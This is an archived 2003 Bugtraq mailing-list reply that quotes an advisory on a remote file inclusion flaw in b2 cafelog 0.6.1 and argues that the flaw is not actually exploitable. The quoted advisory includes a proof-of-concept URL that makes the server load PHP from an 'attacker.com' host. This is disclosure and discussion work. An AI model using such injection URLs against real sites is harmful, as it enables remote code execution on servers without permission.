lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <3ED6FB98.6070101@zed1.com>
Date: Fri, 30 May 2003 07:35:04 +0100
From: mike little <mike@...1.com>
To: bugtraq@...urityfocus.com
Subject: Re: b2 cafelog 0.6.1 remote command execution.


pokleyzz wrote:
> Products: b2 cafelog 0.6.1 (http://cafelog.com/)
> Date: 29 May 2003
> Author: pokleyzz <pokleyzz_at_scan-associates.net>
> Contributors: sk_at_scan-associates.net
>                shaharil_at_scan-associates.net
>                munir_at_scan-associates.net
> URL: http://www.scan-associates.net
> 
> Summary:  b2 cafelog 0.6.1 remote command execution.
> 
> Description
> ===========
> b2 cafelog is blogger system written in php with mysql ad database backend.
> 
> Details
> =======
> b2 cafelog 0.6.1 come with directory b2-tools.  This directory contain 2 
> php scripts
> (blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc 
> and do
> remote code injection.
> 
> from blogger-2-b2.php line 21 
> -----------------------------------------------------
> case "step1":
> 
>    include("b2config.php");
>    include("$b2inc/b2functions.php");
>    include("$b2inc/b2vars.php");
> ------------------------------------------------------------------------------------ 
> 
> 
> from gm-2-b2.php line 5 
> ----------------------------------------------------------
> // 3. load in the browser from there
> 
> include("b2config.php");
> include($b2inc."/b2functions.php");
> ----------------------------------------------------------------------------------- 
> 
> 
> Proof of concept
> ===========
> http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com
> attacker.com have file named b2functions.php with php script you want to
> execute.
> 
> Workaround
> =========
> Remove b2-tools directory.
> 
> Vendor Response
> ===============
> Vendor has been contacted on 19/05/2003 but to reply given.
> 
> 

Firstly, the issue has been addressed 
http://tidakada.com/board/viewtopic.php?t=3212
and a new version issued
http://tidakada.com/board/viewtopic.php?t=3234


Secondly, has anyone tried this? The fact is that b2config.php defines 
$b2inc with no test before hand. So that, whilst for the duration of the 
parsing of b2config.php, $b2inc could indeed be set to some value from 
the outside world. It is immediately overwritten with no check with the 
value set by the user (or left from the defalut installation).
In order to effectively use the setting of b2inc for malicious purposes 
you would have to have enough access to edit b2config.php.


Mike

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ